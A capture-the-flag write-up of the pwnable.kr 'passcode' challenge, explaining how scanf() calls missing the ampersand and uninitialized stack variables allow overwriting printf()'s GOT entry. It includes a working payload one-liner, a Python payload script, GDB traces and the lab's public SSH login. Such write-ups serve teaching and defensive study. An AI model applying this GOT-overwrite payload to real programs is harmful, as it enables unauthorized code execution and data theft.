Passcode
Using scanf() to Overwrite Memory
0xd4y
July 15, 2021
0xd4y Writeups
LinkedIn: https://www.linkedin.com/in/segev-eliezer/
Email: 0xd4yWriteups@gmail.com
Table of Contents
Examining Segmentation Fault
Taking Advantage of name[100]
Understanding Dynamic Linking
Examining the GOT Overwrite in GDB
Insecure code in the passcode.c file resulted in user control of memory that is meant to be inaccessible. The lack of variable initialization in the login() function, coupled with the improper usage of the libc scanf() function, led to the execution of the /bin/cat system command upon passing a carefully constructed malicious string. Specifically, the second argument of each scanf("%d", ...) call in login() was not an integer pointer, as it was not prepended with an ampersand; scanf() therefore used the variable's uninitialized value as the address to write to. Taking advantage of this insecure code and of the fact that the binary in question is dynamically linked, an attacker is capable of overwriting the GOT entry of printf() or fflush() so that the next call to that function jumps to an attacker-chosen address in the binary.
The source code and compiled binary of the program were provided. Furthermore, the SSH credentials of the owner of this binary were given:
Username | Password
passcode | guest
Before executing the binary, the program’s behavior will first be analyzed:
#include <stdio.h>
There are three user-created functions in total: main(), welcome(), and login(). The main() function is of little interest on its own, as it only calls printf() and then the welcome() and login() functions in succession. Looking at welcome(), a buffer name[100] is declared with 100 bytes. Afterwards, scanf() is called with the format string %100s; up to 100 characters of input (plus a terminating null byte) are stored in the aforementioned buffer and subsequently printed out by printf() (this behavior is examined in the Taking Advantage of name[100] section). After welcome() returns, the login() function is executed.
Two variables are declared but never initialized: int passcode1 and int passcode2. Following the declaration of these variables, scanf("%d", passcode1) is called, but the second argument is not an integer pointer, as it is not prepended with the ampersand symbol; scanf() therefore writes the parsed integer to whatever address the uninitialized passcode1 happens to contain. Next, fflush(stdin) is called as opposed to fflush(stdout). Incidentally, the former is not recommended, as the C standard leaves the behavior of fflush() on an input stream undefined. fflush() is meant for output streams, for which it writes any buffered data out to the underlying file, such as the console[1]. The scanf() function is then called again for passcode2, and again the second argument is not prepended with the ampersand symbol. Lastly, an if statement checks whether passcode1 is equal to 338150 and passcode2 is equal to 13371337. If this condition is true, the flag located on the target system is read out with /bin/cat.
Executing the binary with the input of 338150 for passcode1 and 13371337 for passcode2 results in a segmentation fault:
┌──(0xd4y㉿Writeup)-[~/.../other/pwnable.kr/easy/passcode]
This behavior can be further examined using GDB, the GNU Project debugger, which is useful for dynamic analysis[2].
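Running this binary in GDB reveals that the segmentation fault occurs inside scanf(), at an instruction in __vfscanf_internal that stores EAX into the memory address held in EDX:
0xf7e23250 <__vfscanf_internal+14720> mov dword ptr [edx], eax
Looking at the value of the EAX register reveals the input passed for the passcode2 variable:
eax 0xcc07c9 13371337
Therefore, scanf() tries to store the integer typed by the user at the address held in the uninitialized passcode2 variable, and the program crashes because that leftover value is not a valid writable address. If the value of such a variable can be controlled, the same scanf() call becomes a write of an arbitrary 4-byte integer to an arbitrary address.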
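The write primitive described above can be modeled with a toy Python sketch. It does not touch real process memory: the base address, the region size, and the garbage value 0xDEADBEEF are hypothetical, and a MemoryError stands in for the segmentation fault.

```python
import struct

# Toy 32-bit little-endian memory region. BASE and the region size are
# hypothetical values chosen for illustration only.
BASE = 0x0804A000
memory = bytearray(0x100)


def write_u32(addr: int, value: int) -> None:
    """Store a 32-bit value at addr, like `mov dword ptr [edx], eax`."""
    off = addr - BASE
    if not 0 <= off <= len(memory) - 4:
        # Stands in for the segmentation fault seen in GDB.
        raise MemoryError(f"segmentation fault: write to {addr:#010x}")
    memory[off:off + 4] = struct.pack("<I", value & 0xFFFFFFFF)


def read_u32(addr: int) -> int:
    off = addr - BASE
    return struct.unpack("<I", memory[off:off + 4])[0]


def buggy_scanf_d(passcode: int, text: str) -> None:
    """Models scanf("%d", passcode) without '&': the variable's *value*
    is used as the destination address for the parsed integer."""
    write_u32(passcode, int(text))


# Leftover garbage in the variable: the write lands on an unmapped address.
try:
    buggy_scanf_d(0xDEADBEEF, "13371337")
except MemoryError as err:
    print(err)  # segmentation fault: write to 0xdeadbeef

# Attacker-controlled value in the variable: a chosen 4-byte write.
buggy_scanf_d(0x0804A000, "134514135")
print(hex(read_u32(0x0804A000)))  # 0x80485d7
```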
Recall that welcome() allocates 100 bytes for the name buffer and fills it with scanf("%100s", name). The %s conversion performs no boundary checks of its own; only the field width limits how much is written, so user input can overflow the buffer if the developer does not choose a safe field width. The width counts the characters read and does not include the terminating null byte, so a %100s conversion can write up to 101 bytes. Because the field width (100) equals the size of name (100 bytes), the trailing null byte spills one byte past the end of the buffer. Moreover, welcome() and login() are called one after the other from main(), so their stack frames occupy the same region of memory, and the uninitialized passcode1 and passcode2 variables in login() inherit whatever welcome() left there. As a result, input written to name can set memory that login() later reads and that is otherwise inaccessible to the user. To demonstrate this concept, observe the following:
pwndbg> disass login
Note the line highlighted in red, which marks the beginning of the if statement: the hex value 0x528e6 (338150 in decimal) is compared to ebp-0x10, so passcode1 is stored at ebp-0x10. By the same token, the line highlighted in purple compares 0xcc07c9 (13371337 in decimal) to ebp-0xc, so passcode2 is stored at ebp-0xc.
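The hex-to-decimal conversions of the two comparison constants can be double-checked with a few lines of Python (a quick sanity check, not part of the exploit):

```python
# Constants compared against the stack slots in login()'s if statement.
PASSCODE1_EXPECTED = 0x528E6    # compared to ebp-0x10 (passcode1)
PASSCODE2_EXPECTED = 0xCC07C9   # compared to ebp-0xc  (passcode2)

print(PASSCODE1_EXPECTED, PASSCODE2_EXPECTED)  # 338150 13371337

# The two int variables sit in adjacent 4-byte slots on the stack.
print(0x10 - 0xC)  # 4
```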
pwndbg> b *login+97
pwndbg> x/x $ebp-0x10
0x41 is the ASCII code for 'A'. Therefore, upon passing a large input to the name[100] buffer, the value of passcode1 can be written into; specifically, bytes 96 through 99 of the input land in passcode1. Additionally, observe the value of passcode2 located at ebp-0xc:
pwndbg> x/x $ebp-0xc
The null byte that scanf() automatically appends to mark the end of a string leaks into passcode2, as can be seen from the trailing zeros. Moreover, note how, although 101 A's were passed, the last A did not flood into passcode2 because of the field width specification (namely %100s) in the scanf("%100s", name) call.
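The overlap between welcome()'s name buffer and login()'s variables can be reproduced with a small Python model. The layout is an assumption inferred rather than read from the binary: name is taken to start at ebp-0x70 (passcode1 at ebp-0x10 minus the 96 bytes of padding used in the exploit, 96 = 0x60), both functions are assumed to run with the same ebp, and the 0xCC filler is hypothetical leftover stack data.

```python
import struct

# Assumed layout, inferred rather than read from the binary: name[] at
# ebp-0x70 in welcome(), passcode1 at ebp-0x10 and passcode2 at ebp-0xc in
# login(), with both functions running on the same ebp.
NAME_OFF, PASSCODE1_OFF, PASSCODE2_OFF = 0x70, 0x10, 0x0C

# Shared stack bytes from ebp-0x70 up to ebp; 0xCC is hypothetical leftover data.
frame = bytearray(b"\xcc" * NAME_OFF)
WHITESPACE = b" \t\n\v\f\r"


def index(off: int) -> int:
    """Position of the address ebp-off inside `frame`."""
    return NAME_OFF - off


def welcome_scanf_100s(data: bytes) -> None:
    """Models scanf("%100s", name): skip leading whitespace, copy at most
    100 non-whitespace bytes, then append a terminating null byte."""
    data = data.lstrip(WHITESPACE)
    n = 0
    while n < len(data) and n < 100 and data[n] not in WHITESPACE:
        n += 1
    start = index(NAME_OFF)
    frame[start:start + n + 1] = data[:n] + b"\x00"


def login_read_u32(off: int) -> int:
    """What login() sees in the uninitialized int stored at ebp-off."""
    i = index(off)
    return struct.unpack("<I", frame[i:i + 4])[0]


welcome_scanf_100s(b"A" * 101)
print(hex(login_read_u32(PASSCODE1_OFF)))  # 0x41414141
print(hex(login_read_u32(PASSCODE2_OFF)))  # 0xcccccc00
```

Under these assumptions, the 101st 'A' is dropped by the field width, passcode1 becomes 0x41414141, and only the null terminator reaches passcode2.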
Because scanf() writes to the addresses held in passcode1 and passcode2 rather than into the variables themselves, passing in 338150 as passcode1 and 13371337 as passcode2 does not result in the expected execution of /bin/cat; rather, a segmentation fault occurs (see Examining Segmentation Fault). Therefore, in order to execute /bin/cat, the program's control flow must be redirected to an address after the if statement and before the call to system(). Looking at the disassembly of the login() function, this leaves the following addresses: 0x080485d7, 0x080485de, and 0x080485e3. For the purposes of this report, the 0x080485d7 address is used, which is 134514135 in decimal; the decimal form is needed because the value is entered through scanf("%d", ...).
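Converting the candidate jump targets into the decimal text that scanf("%d", ...) expects is simple arithmetic. The helper below is a hypothetical sketch; it also handles addresses of 0x80000000 and above, which a signed int can only hold as a negative number (not needed for these three addresses).

```python
def to_scanf_d(addr: int) -> str:
    """Decimal text that makes scanf("%d", ...) store the 32-bit value addr.

    %d parses a signed int, so values >= 2**31 are written in their
    negative two's-complement form.
    """
    addr &= 0xFFFFFFFF
    return str(addr - (1 << 32) if addr >= (1 << 31) else addr)


# Candidate addresses between the if statement and the system() call.
for target in (0x080485D7, 0x080485DE, 0x080485E3):
    print(f"{target:#010x} -> {to_scanf_d(target)}")
# 0x080485d7 -> 134514135
# 0x080485de -> 134514142
# 0x080485e3 -> 134514147
```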
With the established notion that execution must reach one of the aforementioned addresses to get to the system() call, the next question is “Which memory address should be overwritten with the desired value?”. Ideally, the stored address of a function that is called after the malicious scanf() write can be overwritten, so that calling that function jumps to one of the desired addresses instead.
Using the readelf -a passcode command, the file header, sections, and symbols (along with a lot of other information) can be seen. The relocation section is particularly useful, as it shows where the addresses of imported functions are stored in memory.
Relocation section '.rel.plt' at offset 0x398 contains 9 entries:
readelf found nine relocation entries in total, one for each imported function. Looking at the Source Code, printf() and fflush() are both called after the first scanf() and before the system() call, so either function's entry will work for this exploit; in this report, printf() is utilized. The GOT entry of printf() is located at 0x0804a000, and because this binary is little-endian, that address is written as the bytes \x00\xa0\x04\x08.
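The byte order of the GOT address can be checked with Python's struct module. The whitespace check reflects a constraint of %s, which stops reading at whitespace: the address bytes must survive being read as part of name. A null byte is not whitespace, so %s reads it like any other byte.

```python
import struct

PRINTF_GOT = 0x0804A000  # printf()'s GOT entry, as examined in GDB

packed = struct.pack("<I", PRINTF_GOT)  # "<I": little-endian unsigned 32-bit
print(packed)  # b'\x00\xa0\x04\x08'

# %s stops at whitespace, so none of these bytes may be a whitespace character.
WHITESPACE = b" \t\n\v\f\r"
print(all(byte not in WHITESPACE for byte in packed))  # True

# Reading the bytes back little-endian recovers the original address.
print(hex(struct.unpack("<I", packed)[0]))  # 0x804a000
```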
Piecing the information found in Where to Jump and Which Function to Overwrite together, the final exploit can be constructed:
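Pseudo-Exploit: JUNK_BYTE * 96 + GOT_ENTRY_OF_FUNCTION_TO_OVERWRITE + WHERE_TO_JUMP (in decimal)
The %100s conversion in welcome() consumes exactly the first 100 bytes (the 96 junk bytes plus the GOT address, which ends up in passcode1), leaving the decimal jump target in the input stream for scanf("%d", passcode1), which writes it to the GOT entry.
Exploit: python -c "print 'A'*96 + '\x00\xa0\x04\x08' + '134514135'"
passcode@pwnable:~$ python -c "print 'A'*96 + '\x00\xa0\x04\x08' + '134514135'" |./passcode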
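The python -c one-liner above uses Python 2 syntax. A Python 3 sketch of the same payload follows; it also models, roughly, how the two scanf() calls split the input. The read_token() helper is a simplified, hypothetical model of scanf's whitespace handling, not glibc's implementation.

```python
import struct
import sys

JUNK_LEN = 96             # bytes of name[] that precede the slot reused as passcode1
PRINTF_GOT = 0x0804A000   # GOT entry to overwrite
TARGET = 0x080485D7       # address between the if statement and system()
WHITESPACE = b" \t\n\v\f\r"


def build_payload() -> bytes:
    # print in Python 2 appends a newline, so the payload does too.
    return b"A" * JUNK_LEN + struct.pack("<I", PRINTF_GOT) + str(TARGET).encode() + b"\n"


def read_token(buf: bytes, pos: int, width: int):
    """Rough model of a scanf conversion: skip whitespace, then read at most
    `width` non-whitespace bytes. Returns (token, new_position)."""
    while pos < len(buf) and buf[pos] in WHITESPACE:
        pos += 1
    start = pos
    while pos < len(buf) and pos - start < width and buf[pos] not in WHITESPACE:
        pos += 1
    return buf[start:pos], pos


if __name__ == "__main__":
    payload = build_payload()
    name, pos = read_token(payload, 0, 100)      # scanf("%100s", name)
    digits, _ = read_token(payload, pos, 32)     # scanf("%d", passcode1)
    passcode1 = struct.unpack("<I", name[JUNK_LEN:JUNK_LEN + 4])[0]
    # Diagnostics go to stderr so stdout carries only the payload.
    print(f"write {int(digits)} to {passcode1:#010x}", file=sys.stderr)
    sys.stdout.buffer.write(payload)
```

Assuming Python 3 is available on the target and the sketch is saved under a hypothetical name such as exploit.py, it would be used as `python3 exploit.py | ./passcode`.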
The binary exploited in this report was unstripped and dynamically linked:
┌──(0xd4y㉿Writeup)-[~/.../other/pwnable.kr/easy/passcode]
The fact that it was dynamically linked played an essential role in making the exploit succeed. To understand exactly how it worked, it is important to realize what dynamic linking is and how it operates.
When a binary is dynamically linked, its calls to libc functions do not point directly at the functions' code in libc, whose location is only known once the program is loaded. Take the following snippet from passcode for example:
0x08048593 <+47>: call 0x8048430 <fflush@plt>
Note the text highlighted in red. The program calls fflush() and printf() through fflush@plt and printf@plt, located at 0x8048430 and 0x8048420 respectively. These are stubs in the Procedure Linkage Table (PLT), a table which converts position-independent function calls to absolute locations[3]. Each PLT stub performs an indirect jump through the called function's entry in the Global Offset Table (GOT), which maps symbols (such as printf()) to their actual location[4]. With lazy binding, a GOT entry initially points back into the PLT, so the first call invokes the dynamic linker, which resolves the real libc address and stores it in the GOT; later calls jump straight to libc. Because the GOT of this binary is writable at run time, the exploit was able to overwrite the GOT entry that maps printf() to its actual location so that it instead points to 0x080485d7, and the next call to printf@plt jumped there.
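The indirection described above can be illustrated with a toy Python model of a call through the PLT. PRINTF_PLT, PRINTF_GOT, and 0x080485d7 come from this report; LIBC_PRINTF is a hypothetical libc address, and the "PLT entry + 6" initial GOT value reflects the typical i386 PLT layout rather than anything measured here.

```python
# Toy model of a call through the PLT with lazy binding.
PRINTF_PLT = 0x08048420
PRINTF_GOT = 0x0804A000
LIBC_PRINTF = 0xF7E40000        # hypothetical address of printf() in libc
RESOLVE_STUB = PRINTF_PLT + 6   # typical i386 layout: the GOT slot first points
                                # back to the push instruction after the jmp

got = {PRINTF_GOT: RESOLVE_STUB}


def call_printf_plt() -> int:
    """printf@plt does `jmp *PRINTF_GOT`; return where execution lands."""
    dest = got[PRINTF_GOT]
    if dest == RESOLVE_STUB:
        # First call: the dynamic linker resolves printf() and patches the GOT.
        got[PRINTF_GOT] = LIBC_PRINTF
        dest = LIBC_PRINTF
    return dest


print(hex(call_printf_plt()))  # 0xf7e40000 (resolved on first call)
print(hex(call_printf_plt()))  # 0xf7e40000 (read straight from the GOT)

got[PRINTF_GOT] = 0x080485D7   # the scanf() write performed by the exploit
print(hex(call_printf_plt()))  # 0x80485d7, inside login() after the if statement
```

The call site never changes; only the GOT slot it jumps through does, which is why a single 4-byte write is enough to redirect control flow.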
The way the binary handles the malicious input can be examined in more detail within GDB. After disassembling the login() function, it can be seen that the printf() call that follows the first scanf() is at login+60 (or 0x080485a0):
0x080485a0 <+60>: call 0x8048420 <printf@plt>
After setting a breakpoint at this call and passing in the exploit, the breakpoint gets hit:
pwndbg> b *login+60
Since the exploit works, the address 0x80485d7 must be stored somewhere in memory. To find its exact location, the info proc mappings and find commands within GDB can be utilized:
pwndbg> info proc mappings
Recall that 134514135 is 0x080485d7 in hex, and that it points to the location between the if statement and the system() call.
pwndbg> p/x 134514135
Note that the find command has the syntax find start_address, end_address, value_to_look_for.
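What find does for a 4-byte value can be approximated in Python: encode the value little-endian and scan the address range for it. This is a rough, hypothetical analogue of GDB's command, run on a made-up memory snapshot rather than on the real process.

```python
import struct


def find_u32(memory: bytes, base: int, start: int, end: int, value: int) -> list:
    """Rough analogue of GDB's `find start, end, value` for a 4-byte value:
    every address in [start, end] where the little-endian bytes of value occur."""
    pattern = struct.pack("<I", value & 0xFFFFFFFF)
    region = memory[start - base:end - base + 1]
    hits, i = [], region.find(pattern)
    while i != -1:
        hits.append(start + i)
        i = region.find(pattern, i + 1)
    return hits


# Hypothetical snapshot of a writable mapping starting at 0x0804a000,
# taken after the exploit wrote 134514135 (0x080485d7) into printf()'s GOT entry.
base = 0x0804A000
snapshot = bytearray(0x1000)
snapshot[0:4] = struct.pack("<I", 134514135)

print([hex(a) for a in find_u32(bytes(snapshot), base, base, base + 0xFFF, 134514135)])
# ['0x804a000']
```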
The GOT entry for printf() was successfully overwritten with 0x080485d7. Observe that this is different from the value the entry held before the exploit:
pwndbg> x/x 0x804a000
When stepping, it is expected that the printf() call will go through printf@plt, which reads the GOT entry of printf(). The program will then be tricked into believing that the code for printf() can be found at 0x080485d7, and EIP will therefore point to 0x080485d7:
=> 0x080485a0 <+60>: call 0x8048420 <printf@plt>
pwndbg> x/x $eip
pwndbg> s
Observe that the instruction pointer (EIP) jumped to the location between the if statement and the system() call.
The binary was successfully exploited, which resulted in the leakage of otherwise inaccessible data. Compiler warnings should never be ignored. Unsafe practices involving user input can lead to security holes. The scanf() function was improperly used, and it is not recommended for reading strings unless the developer carefully matches the field width specifier to the allocated buffer size (the width must be no greater than the buffer size minus one, to leave room for the null byte). Furthermore, the second argument of scanf() was not prepended with the ampersand symbol, which allowed an attacker-supplied address to be used as the write destination, causing the overwrite of printf()'s GOT entry. The following remediations should be strongly considered:
The aforementioned remediations should be followed as soon as possible to prevent the attack described in this report. It is essential that the developer follow safe programming practices, especially when dealing with user input.